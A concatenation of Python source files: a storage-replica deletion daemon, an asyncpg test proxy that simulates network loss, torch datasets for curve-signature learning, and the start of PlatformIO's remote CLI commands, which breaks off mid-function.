                                                                        'rse': rse_info['rse'],
                                                                        'rse_id': rse_info['id'],
                                                                        'file-size': replica['bytes'],
                                                                        'bytes': replica['bytes'],
                                                                        'url': replica['pfn'],
                                                                        'reason': str(error),
                                                                        'protocol': prot.attributes['scheme']})
                                    except Exception as error:
                                        logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
                                        add_message('deletion-failed', {'scope': replica['scope'].external,
                                                                        'name': replica['name'],
                                                                        'rse': rse_info['rse'],
                                                                        'rse_id': rse_info['id'],
                                                                        'file-size': replica['bytes'],
                                                                        'bytes': replica['bytes'],
                                                                        'url': replica['pfn'],
                                                                        'reason': str(error),
                                                                        'protocol': prot.attributes['scheme']})
                                    except:
                                        logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
                            except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
                                # Whole-chunk failure (e.g. connect()): report every file
                                # and stop processing further chunks for this RSE.
                                for replica in files:
                                    logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
                                    add_message('deletion-failed', {'scope': replica['scope'].external,
                                                                    'name': replica['name'],
                                                                    'rse': rse_info['rse'],
                                                                    'rse_id': rse_info['id'],
                                                                    'file-size': replica['bytes'],
                                                                    'bytes': replica['bytes'],
                                                                    'url': replica['pfn'],
                                                                    'reason': str(error),
                                                                    'protocol': prot.attributes['scheme']})
                                break
                            finally:
                                prot.close()
                            start = time.time()
                            with monitor.record_timer_block('reaper.delete_replicas'):
                                delete_replicas(rse_id=rse['id'], files=deleted_files)
                            logging.debug('Reaper %s-%s: delete_replicas successes %s %s %s', worker_number, child_number, rse['rse'], len(deleted_files), time.time() - start)
                            monitor.record_counter(counters='reaper.deletion.done', delta=len(deleted_files))

                        except DatabaseException as error:
                            logging.warning('Reaper %s-%s: DatabaseException %s', worker_number, child_number, str(error))
                        except UnsupportedOperation as error:
                            logging.warning('Reaper %s-%s: UnsupportedOperation %s', worker_number, child_number, str(error))
                        except:
                            logging.critical(traceback.format_exc())

                except RSENotFound as error:
                    logging.warning('Reaper %s-%s: RSE not found %s', worker_number, child_number, str(error))

                except:
                    logging.critical(traceback.format_exc())

            if once:
                break

            time.sleep(1)

        except DatabaseException as error:
            logging.warning('Reaper: %s', str(error))
        except:
            logging.critical(traceback.format_exc())

    die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
    logging.info('Graceful stop requested')
    logging.info('Graceful stop done')
    return
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signal-handler compatible signature; sets GRACEFUL_STOP so all reaper
    loops finish their current iteration and exit.
    """
    GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, threads_per_worker=None, once=False, greedy=False, rses=None, scheme=None, exclude_rses=None, include_rses=None, delay_seconds=0):
    """
    Starts up the reaper threads.

    :param total_workers: The total number of workers.
    :param chunk_size: the size of chunk for deletion.
    :param threads_per_worker: Total number of threads created by each worker.
    :param once: If True, only runs one iteration of the main loop.
    :param greedy: If True, delete right away replicas with tombstone.
    :param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
    :param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
    :param exclude_rses: RSE expression to exclude RSEs from the Reaper.
    :param include_rses: RSE expression to include RSEs.
    :param delay_seconds: Passed through to each reaper thread.
    """
    logging.info('main: starting processes')

    all_rses = rse_core.list_rses()
    # BUG FIX: default was the mutable `rses=[]`; None with the same falsy
    # semantics avoids the shared-default pitfall without changing behavior.
    if rses:
        invalid = set(rses) - set([rse['rse'] for rse in all_rses])
        if invalid:
            msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
                                                    ', '.join([repr(rse) for rse in invalid]))
            raise RSENotFound(msg)
        rses = [rse for rse in all_rses if rse['rse'] in rses]
    else:
        rses = all_rses

    if exclude_rses:
        # Sort the RSEs getting the exclusion out of the way first.
        excluded_rses = parse_expression(exclude_rses)
        rses = [rse for rse in rses if rse not in excluded_rses]

    if include_rses:
        included_rses = parse_expression(include_rses)
        rses = [rse for rse in rses if rse in included_rses]

    if not rses:
        logging.error('Reaper: No RSEs found. Exiting.')
        return

    logging.info('Reaper: This instance will work on RSEs: ' + ', '.join([rse['rse'] for rse in rses]))

    threads = []
    nb_rses_per_worker = int(math.ceil(len(rses) / float(total_workers))) or 1
    # Shuffle so workers do not all start on the same RSEs across restarts.
    rses = random.sample(rses, len(rses))
    for worker in range(total_workers):
        for child in range(threads_per_worker or 1):
            # Each worker gets a contiguous slice of the shuffled RSE list.
            rses_list = rses[worker * nb_rses_per_worker: worker * nb_rses_per_worker + nb_rses_per_worker]
            if not rses_list:
                logging.warning('Reaper: Empty RSEs list for worker %(worker)s' % locals())
                continue
            kwargs = {'worker_number': worker,
                      'child_number': child + 1,
                      'total_children': threads_per_worker or 1,
                      'once': once,
                      'chunk_size': chunk_size,
                      'greedy': greedy,
                      'rses': rses_list,
                      'delay_seconds': delay_seconds,
                      'scheme': scheme}
            threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, child: %s' % (worker, child + 1)))
    [t.start() for t in threads]
    # Defensive guard: the original indexed threads[0] unconditionally, which
    # would raise IndexError if no thread was ever created.
    if not threads:
        logging.warning('Reaper: no worker threads were started')
        return
    while threads[0].is_alive():
        [t.join(timeout=3.14) for t in threads]
|
fuzzer.py | # Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
    # Internal control-flow signal: raised by TCPFuzzingProxy._wait() when
    # the stop event fires, unwinding the accept/connect loops on shutdown.
    pass
class TCPFuzzingProxy:
    """TCP man-in-the-middle proxy used in tests to fuzz client/backend
    connectivity.

    The proxy runs its own asyncio event loop on a dedicated thread (see
    start()/_start()).  The public control methods — stop(),
    trigger_connectivity_loss(), restore_connectivity() — are intended to be
    called from OTHER threads and marshal work onto the proxy loop via
    call_soon_threadsafe().
    """

    def __init__(self, *, listening_addr: str='127.0.0.1',
                 listening_port: typing.Optional[int]=None,
                 backend_host: str, backend_port: int,
                 settings: typing.Optional[dict]=None) -> None:
        self.listening_addr = listening_addr
        self.listening_port = listening_port
        self.backend_host = backend_host
        self.backend_port = backend_port
        self.settings = settings or {}
        # Loop and events are created lazily in _start(), on the proxy
        # thread, so they are bound to the proxy's own event loop.
        self.loop = None
        self.connectivity = None
        self.connectivity_loss = None
        self.stop_event = None
        # Maps live Connection -> asyncio.Task running its handle().
        self.connections = {}
        self.sock = None
        self.listen_task = None

    async def _wait(self, work):
        """Await *work*, but raise StopServer if stop_event is set first."""
        work_task = asyncio.ensure_future(work, loop=self.loop)
        stop_event_task = asyncio.ensure_future(self.stop_event.wait(),
                                                loop=self.loop)
        try:
            await asyncio.wait(
                [work_task, stop_event_task],
                return_when=asyncio.FIRST_COMPLETED,
                loop=self.loop)
            if self.stop_event.is_set():
                raise StopServer()
            else:
                return work_task.result()
        finally:
            # Cancel whichever side lost the race so no task leaks.
            if not work_task.done():
                work_task.cancel()
            if not stop_event_task.done():
                stop_event_task.cancel()

    def start(self):
        """Spawn the proxy thread and wait until it is ready to accept."""
        started = threading.Event()
        self.thread = threading.Thread(target=self._start, args=(started,))
        self.thread.start()
        if not started.wait(timeout=2):
            raise RuntimeError('fuzzer proxy failed to start')

    def stop(self):
        """Thread-safe shutdown: signal the loop, then join the proxy thread."""
        self.loop.call_soon_threadsafe(self._stop)
        self.thread.join()

    def _stop(self):
        # Runs on the proxy loop; makes every pending _wait() raise StopServer.
        self.stop_event.set()

    def _start(self, started_event):
        """Thread target: build the loop, events and listening socket, then serve."""
        self.loop = asyncio.new_event_loop()
        # `connectivity` set <=> traffic flows; `connectivity_loss` is the
        # inverse signal awaited inside Connection reads/writes.
        self.connectivity = asyncio.Event(loop=self.loop)
        self.connectivity.set()
        self.connectivity_loss = asyncio.Event(loop=self.loop)
        self.stop_event = asyncio.Event(loop=self.loop)
        if self.listening_port is None:
            self.listening_port = cluster.find_available_port()
        self.sock = socket.socket()
        self.sock.bind((self.listening_addr, self.listening_port))
        self.sock.listen(50)
        self.sock.setblocking(False)
        try:
            self.loop.run_until_complete(self._main(started_event))
        finally:
            self.loop.close()

    async def _main(self, started_event):
        self.listen_task = asyncio.ensure_future(self.listen(), loop=self.loop)
        # Notify the main thread that we are ready to go.
        started_event.set()
        try:
            await self.listen_task
        finally:
            # Close all live connections, let their close callbacks run for
            # one short tick, then tear down the listening socket.
            for c in list(self.connections):
                c.close()
            await asyncio.sleep(0.01, loop=self.loop)
            if hasattr(self.loop, 'remove_reader'):
                self.loop.remove_reader(self.sock.fileno())
            self.sock.close()

    async def listen(self):
        """Accept clients forever; dial the backend and start a Connection each."""
        while True:
            try:
                client_sock, _ = await self._wait(
                    self.loop.sock_accept(self.sock))
                backend_sock = socket.socket()
                backend_sock.setblocking(False)
                await self._wait(self.loop.sock_connect(
                    backend_sock, (self.backend_host, self.backend_port)))
            except StopServer:
                break
            conn = Connection(client_sock, backend_sock, self)
            conn_task = self.loop.create_task(conn.handle())
            self.connections[conn] = conn_task

    def trigger_connectivity_loss(self):
        """Thread-safe: simulate a network partition (pause relaying)."""
        self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)

    def _trigger_connectivity_loss(self):
        self.connectivity.clear()
        self.connectivity_loss.set()

    def restore_connectivity(self):
        """Thread-safe: end the simulated partition (resume relaying)."""
        self.loop.call_soon_threadsafe(self._restore_connectivity)

    def _restore_connectivity(self):
        self.connectivity.set()
        self.connectivity_loss.clear()

    def reset(self):
        self.restore_connectivity()

    def _close_connection(self, connection):
        # Called back by Connection.close(); drop and cancel its task.
        conn_task = self.connections.pop(connection, None)
        if conn_task is not None:
            conn_task.cancel()
class Connection:
    """One proxied client <-> backend TCP session.

    Two pump coroutines relay bytes in each direction.  During a simulated
    connectivity loss, relaying pauses and at most one read chunk per
    direction is buffered until connectivity is restored.
    """

    def __init__(self, client_sock, backend_sock, proxy):
        self.client_sock = client_sock
        self.backend_sock = backend_sock
        self.proxy = proxy
        self.loop = proxy.loop
        # Shared events owned by the proxy.
        self.connectivity = proxy.connectivity
        self.connectivity_loss = proxy.connectivity_loss
        self.proxy_to_backend_task = None
        self.proxy_from_backend_task = None
        self.is_closed = False

    def close(self):
        """Idempotently cancel both pumps and deregister from the proxy."""
        if self.is_closed:
            return
        self.is_closed = True
        if self.proxy_to_backend_task is not None:
            self.proxy_to_backend_task.cancel()
            self.proxy_to_backend_task = None
        if self.proxy_from_backend_task is not None:
            self.proxy_from_backend_task.cancel()
            self.proxy_from_backend_task = None
        self.proxy._close_connection(self)

    async def handle(self):
        """Run both pumps until either finishes, then tear down the sockets."""
        self.proxy_to_backend_task = asyncio.ensure_future(
            self.proxy_to_backend(), loop=self.loop)
        self.proxy_from_backend_task = asyncio.ensure_future(
            self.proxy_from_backend(), loop=self.loop)
        try:
            await asyncio.wait(
                [self.proxy_to_backend_task, self.proxy_from_backend_task],
                loop=self.loop, return_when=asyncio.FIRST_COMPLETED)
        finally:
            # Asyncio fails to properly remove the readers and writers
            # when the task doing recv() or send() is cancelled, so
            # we must remove the readers and writers manually before
            # closing the sockets.
            self.loop.remove_reader(self.client_sock.fileno())
            self.loop.remove_writer(self.client_sock.fileno())
            self.loop.remove_reader(self.backend_sock.fileno())
            self.loop.remove_writer(self.backend_sock.fileno())
            self.client_sock.close()
            self.backend_sock.close()

    async def _read(self, sock, n):
        """recv() up to *n* bytes, or return None if connectivity is lost first."""
        read_task = asyncio.ensure_future(
            self.loop.sock_recv(sock, n),
            loop=self.loop)
        conn_event_task = asyncio.ensure_future(
            self.connectivity_loss.wait(),
            loop=self.loop)
        try:
            await asyncio.wait(
                [read_task, conn_event_task],
                return_when=asyncio.FIRST_COMPLETED,
                loop=self.loop)
            if self.connectivity_loss.is_set():
                return None
            else:
                return read_task.result()
        finally:
            # Cancel the loser of the race so no task leaks.
            if not read_task.done():
                read_task.cancel()
            if not conn_event_task.done():
                conn_event_task.cancel()

    async def _write(self, sock, data):
        """sendall() *data*, or return None if connectivity is lost first."""
        write_task = asyncio.ensure_future(
            self.loop.sock_sendall(sock, data), loop=self.loop)
        conn_event_task = asyncio.ensure_future(
            self.connectivity_loss.wait(), loop=self.loop)
        try:
            await asyncio.wait(
                [write_task, conn_event_task],
                return_when=asyncio.FIRST_COMPLETED,
                loop=self.loop)
            if self.connectivity_loss.is_set():
                return None
            else:
                return write_task.result()
        finally:
            if not write_task.done():
                write_task.cancel()
            if not conn_event_task.done():
                conn_event_task.cancel()

    async def proxy_to_backend(self):
        """Pump client -> backend until EOF or a connection error."""
        buf = None
        try:
            while True:
                await self.connectivity.wait()
                if buf is not None:
                    # Flush the chunk that was read just before the loss.
                    data = buf
                    buf = None
                else:
                    data = await self._read(self.client_sock, 4096)
                if data == b'':
                    # Peer closed its end.
                    break
                if self.connectivity_loss.is_set():
                    if data:
                        buf = data
                    continue
                await self._write(self.backend_sock, data)
        except ConnectionError:
            pass
        finally:
            # Schedule rather than call: close() cancels this very task.
            self.loop.call_soon(self.close)

    async def proxy_from_backend(self):
        """Pump backend -> client until EOF or a connection error."""
        buf = None
        try:
            while True:
                await self.connectivity.wait()
                if buf is not None:
                    data = buf
                    buf = None
                else:
                    data = await self._read(self.backend_sock, 4096)
                if data == b'':
                    break
                if self.connectivity_loss.is_set():
                    if data:
                        buf = data
                    continue
                await self._write(self.client_sock, data)
        except ConnectionError:
            pass
        finally:
            self.loop.call_soon(self.close)
|
datasets.py | # python peripherals
import os
import numpy
import random
import queue
from multiprocessing import Process, Queue, cpu_count
# torch
import torch
from torch.utils.data import Dataset
# deep_signature
from deep_signature.data_generation import curve_generation
from deep_signature.data_generation import dataset_generation
from deep_signature.data_manipulation import curve_processing
class DeepSignaturePairsDataset(Dataset):
    """Torch dataset of negative/positive curve pairs for deep-signature training.

    Pairs are loaded from 'negative_pairs.npy' / 'positive_pairs.npy'.
    Negative pairs occupy the first rows of the backing array, positive
    pairs the rest, with matching 0/1 labels.
    """

    def __init__(self):
        self._pairs = None
        self._labels = None

    def load_dataset(self, negative_pairs_dir_path, positive_pairs_dir_path):
        """Load both pair files into one array and build the label vector.

        :param negative_pairs_dir_path: directory containing negative_pairs.npy
        :param positive_pairs_dir_path: directory containing positive_pairs.npy
        """
        negative_pairs = numpy.load(file=os.path.normpath(os.path.join(negative_pairs_dir_path, 'negative_pairs.npy')), allow_pickle=True)
        positive_pairs = numpy.load(file=os.path.normpath(os.path.join(positive_pairs_dir_path, 'positive_pairs.npy')), allow_pickle=True)
        full_pairs_count = negative_pairs.shape[0] + positive_pairs.shape[0]
        # BUGFIX: random.shuffle() on a multi-dimensional numpy array swaps
        # rows via views (`x[i], x[j] = x[j], x[i]` aliases), which can
        # silently duplicate/lose rows.  numpy.random.shuffle() correctly
        # permutes along the first axis.
        numpy.random.shuffle(negative_pairs)
        numpy.random.shuffle(positive_pairs)
        self._pairs = numpy.empty((full_pairs_count, negative_pairs.shape[1], negative_pairs.shape[2], negative_pairs.shape[3]))
        self._pairs[:negative_pairs.shape[0], :] = negative_pairs
        self._pairs[negative_pairs.shape[0]:, :] = positive_pairs
        negative_labels = numpy.zeros(negative_pairs.shape[0])
        positive_labels = numpy.ones(positive_pairs.shape[0])
        self._labels = numpy.empty(full_pairs_count)
        self._labels[:negative_pairs.shape[0]] = negative_labels
        self._labels[negative_pairs.shape[0]:] = positive_labels

    def __len__(self):
        return self._labels.shape[0]

    def __getitem__(self, idx):
        """Return {'input': pair tensor, 'labels': label tensor}, on GPU.

        Each curve of the pair is normalized to counter-clockwise
        orientation and rotated to a canonical secant angle first.
        """
        pair = self._pairs[idx, :]
        for i in range(2):
            if not curve_processing.is_ccw(curve=pair[i]):
                pair[i] = numpy.flip(pair[i], axis=0)
        for i in range(2):
            radians = curve_processing.calculate_secant_angle(curve=pair[i])
            pair[i] = curve_processing.rotate_curve(curve=pair[i], radians=radians)
        pair_torch = torch.from_numpy(pair).cuda().double()
        label_torch = torch.from_numpy(numpy.array([self._labels[idx]])).cuda().double()
        return {
            'input': pair_torch,
            'labels': label_torch
        }
class DeepSignatureTupletsDataset(Dataset):
    """Torch dataset over pre-generated tuplets stored in 'tuplets.npy'."""

    def __init__(self):
        self._tuplets = None

    def load_dataset(self, dir_path):
        """Load the pickled object array from dir_path/tuplets.npy."""
        self._tuplets = numpy.load(file=os.path.normpath(os.path.join(dir_path, 'tuplets.npy')), allow_pickle=True)

    def __len__(self):
        return self._tuplets.shape[0]

    def __getitem__(self, index):
        """Return the tuplet at *index* as a dict of double GPU tensors."""
        item = {}
        tuplet = self._tuplets[index]
        for key in tuplet.keys():
            # Reuse the already-fetched `tuplet` instead of re-indexing
            # self._tuplets for every key (the original did both).
            item[key] = torch.from_numpy(numpy.array(tuplet[key]).astype('float64')).cuda().double()
        return item
class EuclideanTuple:
    """Mixin binding tuple generation to the Euclidean dataset generators."""

    @staticmethod
    def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
        """Generate one curvature training tuple in the Euclidean group."""
        generator = dataset_generation.EuclideanCurvatureTupletsDatasetGenerator
        return generator.generate_tuple(
            curves=curves,
            sampling_ratio=sampling_ratio,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            offset_length=offset_length,
            negative_examples_count=negative_examples_count)

    @staticmethod
    def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
        """Generate one arc-length training tuple in the Euclidean group."""
        generator = dataset_generation.EuclideanArcLengthTupletsDatasetGenerator
        return generator.generate_tuple(
            curves=curves,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            min_offset=min_offset,
            max_offset=max_offset)
class EquiaffineTuple:
    """Mixin binding tuple generation to the equiaffine dataset generators.

    (Dead commented-out variant of _generate_arclength_tuple removed.)
    """

    @staticmethod
    def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
        """Generate one curvature training tuple in the equiaffine group."""
        return dataset_generation.EquiaffineCurvatureTupletsDatasetGenerator.generate_tuple(
            curves=curves,
            sampling_ratio=sampling_ratio,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            offset_length=offset_length,
            negative_examples_count=negative_examples_count)

    @staticmethod
    def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
        """Generate one arc-length training tuple in the equiaffine group."""
        return dataset_generation.EquiaffineArcLengthTupletsDatasetGenerator.generate_tuple(
            curves=curves,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            min_offset=min_offset,
            max_offset=max_offset)
class AffineTuple:
    """Mixin binding tuple generation to the affine dataset generators.

    (Dead commented-out variant of _generate_arclength_tuple removed.)
    """

    @staticmethod
    def _generate_curvature_tuple(curves, sampling_ratio, multimodality, supporting_points_count, offset_length, negative_examples_count):
        """Generate one curvature training tuple in the affine group."""
        return dataset_generation.AffineCurvatureTupletsDatasetGenerator.generate_tuple(
            curves=curves,
            sampling_ratio=sampling_ratio,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            offset_length=offset_length,
            negative_examples_count=negative_examples_count)

    @staticmethod
    def _generate_arclength_tuple(curves, multimodality, supporting_points_count, min_offset, max_offset):
        """Generate one arc-length training tuple in the affine group."""
        return dataset_generation.AffineArcLengthTupletsDatasetGenerator.generate_tuple(
            curves=curves,
            multimodality=multimodality,
            supporting_points_count=supporting_points_count,
            min_offset=min_offset,
            max_offset=max_offset)
class DeepSignatureTupletsOnlineDataset(Dataset):
    """Dataset that generates tuplets online in worker processes.

    Worker processes run the subclass-provided `_map_func` and push freshly
    generated tuplets onto a shared queue; a fixed-size in-memory buffer is
    served to the training loop and optionally refreshed on access.
    """

    def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers):
        """
        :param dataset_size: virtual length reported by __len__
        :param dir_path: directory with pre-generated curves
        :param sampling_ratio: forwarded to the tuple generators
        :param multimodality: forwarded to the tuple generators
        :param replace: when True, randomly replace buffered items with fresh ones
        :param buffer_size: number of tuplets kept in memory
        :param num_workers: number of generator processes
        """
        self._curves = curve_generation.CurvesGenerator.load_curves(dir_path)
        self._dataset_size = dataset_size
        self._sampling_ratio = sampling_ratio
        self._multimodality = multimodality
        self._replace = replace
        self._buffer_size = buffer_size
        self._num_workers = num_workers
        self._q = Queue()
        self._args = [self._curves, self._sampling_ratio, self._multimodality, self._q]
        self._items = []
        # BUGFIX: initialize here so stop() is safe even when start() was
        # never called (previously stop() raised AttributeError).
        self._workers = []

    def __len__(self):
        return self._dataset_size

    def __getitem__(self, index):
        item = {}
        # The virtual dataset index wraps around the in-memory buffer.
        mod_index = numpy.mod(index, self._buffer_size)
        tuplet = self._items[mod_index]
        for key in tuplet.keys():
            item[key] = torch.from_numpy(numpy.array(tuplet[key]).astype('float64')).cuda().double()
        if self._replace is True:
            # Opportunistically swap one random buffered item for a freshly
            # generated one without ever blocking the training loop.
            try:
                new_tuplet = self._q.get_nowait()
                rand_index = int(numpy.random.randint(self._buffer_size, size=1))
                self._items[rand_index] = new_tuplet
            except queue.Empty:
                pass
        return item

    def start(self):
        """Spawn the worker processes and block until the buffer is full."""
        self._workers = [Process(target=self._map_func, args=self._args) for i in range(self._num_workers)]
        for i, worker in enumerate(self._workers):
            worker.start()
            print(f'\rWorker Started {i+1} / {self._num_workers}', end='')
        print(f'\nItem {len(self._items)} / {self._buffer_size}', end='')
        while True:
            if self._q.empty() is False:
                self._items.append(self._q.get())
                print(f'\rItem {len(self._items)} / {self._buffer_size}', end='')
            if len(self._items) == self._buffer_size:
                break

    def stop(self):
        """Terminate all worker processes (no-op if start() was never called)."""
        for i, worker in enumerate(self._workers):
            worker.terminate()
class DeepSignatureCurvatureTupletsOnlineDataset(DeepSignatureTupletsOnlineDataset):
    """Online tuplet dataset specialized for curvature training examples."""

    def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers, supporting_points_count, offset_length, negative_examples_count):
        DeepSignatureTupletsOnlineDataset.__init__(
            self,
            dataset_size=dataset_size,
            dir_path=dir_path,
            sampling_ratio=sampling_ratio,
            multimodality=multimodality,
            replace=replace,
            buffer_size=buffer_size,
            num_workers=num_workers)
        # Record the curvature-specific settings and forward them to worker
        # processes by extending the shared argument list (order matters:
        # it must match the tail of _map_func's signature).
        self._supporting_points_count = supporting_points_count
        self._offset_length = offset_length
        self._negative_examples_count = negative_examples_count
        self._args.extend([supporting_points_count, offset_length, negative_examples_count])

    @classmethod
    def _map_func(cls, curves, sampling_ratio, multimodality, q, supporting_points_count, offset_length, negative_examples_count):
        """Worker loop: generate curvature tuplets forever and enqueue them."""
        while True:
            tuplet = cls._generate_curvature_tuple(
                curves=curves,
                sampling_ratio=sampling_ratio,
                multimodality=multimodality,
                supporting_points_count=supporting_points_count,
                offset_length=offset_length,
                negative_examples_count=negative_examples_count)
            q.put(tuplet)
# Concrete curvature datasets: each combines the online-dataset machinery
# with one transformation group's mixin, whose _generate_curvature_tuple
# is picked up by the inherited _map_func.
class DeepSignatureEuclideanCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, EuclideanTuple):
    pass
class DeepSignatureEquiaffineCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, EquiaffineTuple):
    pass
class DeepSignatureAffineCurvatureTupletsOnlineDataset(DeepSignatureCurvatureTupletsOnlineDataset, AffineTuple):
    pass
class DeepSignatureArclengthTupletsOnlineDataset(DeepSignatureTupletsOnlineDataset):
    """Online tuplet dataset specialized for arc-length training examples.

    (Dead commented-out generator call removed from _map_func.)
    """

    def __init__(self, dataset_size, dir_path, sampling_ratio, multimodality, replace, buffer_size, num_workers, section_points_count, supporting_points_count, min_offset, max_offset):
        DeepSignatureTupletsOnlineDataset.__init__(
            self,
            dataset_size=dataset_size,
            dir_path=dir_path,
            sampling_ratio=sampling_ratio,
            multimodality=multimodality,
            replace=replace,
            buffer_size=buffer_size,
            num_workers=num_workers)
        # Appended in the exact order expected by _map_func's signature.
        self._section_points_count = section_points_count
        self._args.append(section_points_count)
        self._supporting_points_count = supporting_points_count
        self._args.append(supporting_points_count)
        self._min_offset = min_offset
        self._args.append(min_offset)
        self._max_offset = max_offset
        self._args.append(max_offset)

    @classmethod
    def _map_func(cls, curves, sampling_ratio, multimodality, q, section_points_count, supporting_points_count, min_offset, max_offset):
        """Worker loop: generate arc-length tuplets forever and enqueue them.

        NOTE(review): `sampling_ratio` and `section_points_count` are part of
        the shared worker argument list but are currently not forwarded to the
        generator — confirm this is intentional.
        """
        while True:
            q.put(cls._generate_arclength_tuple(
                curves=curves,
                multimodality=multimodality,
                supporting_points_count=supporting_points_count,
                min_offset=min_offset,
                max_offset=max_offset))
# Concrete arc-length datasets: one per transformation group, mirroring
# the curvature variants above.
class DeepSignatureEuclideanArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, EuclideanTuple):
    pass
class DeepSignatureEquiaffineArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, EquiaffineTuple):
    pass
class DeepSignatureAffineArclengthTupletsOnlineDataset(DeepSignatureArclengthTupletsOnlineDataset, AffineTuple):
    pass
command.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
    # Store the selected agent names on the click context; subcommands
    # receive them through @click.pass_obj.
    ctx.obj = agent
    # Make the bundled "contrib-pysite" packages importable (and verify the
    # SSL stack) before any remote subcommand runs.
    inject_contrib_pysite(verify_openssl=True)
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
    # Container group for `pio remote agent ...` subcommands.
    pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
    "-d",
    "--working-dir",
    envvar="PLATFORMIO_REMOTE_AGENT_DIR",
    type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
    """Start a remote agent and keep it connected."""
    # Imported lazily so the heavy client stack loads only on demand.
    from platformio.commands.remote.client.agent_service import RemoteAgentService

    service = RemoteAgentService(name, share, working_dir)
    service.connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
    """Print the agents available to the authenticated account."""
    from platformio.commands.remote.client.agent_list import AgentListClient

    client = AgentListClient()
    client.connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
    "-c",
    "--only-check",
    is_flag=True,
    help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
    "--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
    """Ask the selected agents to update their installed core packages."""
    from platformio.commands.remote.client.update_core import UpdateCoreClient

    # `--only-check` is kept for backward compatibility; both flags map
    # to a dry-run on the agent side.
    options = dict(only_check=only_check or dry_run)
    UpdateCoreClient("update", agents, options).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
    "-d",
    "--project-dir",
    default=os.getcwd,
    type=click.Path(
        exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
    ctx,
    agents,
    environment,
    target,
    upload_port,
    project_dir,
    disable_auto_clean,
    force_remote,
    silent,
    verbose,
):
    """Process project environments remotely, building locally when possible."""
    from platformio.commands.remote.client.run_or_test import RunOrTestClient

    client = RunOrTestClient(
        "run",
        agents,
        dict(
            environment=environment,
            target=target,
            upload_port=upload_port,
            project_dir=project_dir,
            disable_auto_clean=disable_auto_clean,
            force_remote=force_remote,
            silent=silent,
            verbose=verbose,
        ),
    )
    # Fully remote: the agent builds and uploads everything itself.
    if force_remote:
        return client.connect()

    # Hybrid mode: compile locally first, then (optionally) upload remotely.
    click.secho("Building project locally", bold=True)
    if "clean" in target:
        local_targets = ["clean"]
    elif {"buildfs", "uploadfs", "uploadfsota"} & set(target):
        local_targets = ["buildfs"]
    else:
        local_targets = ["checkprogsize", "buildprog"]
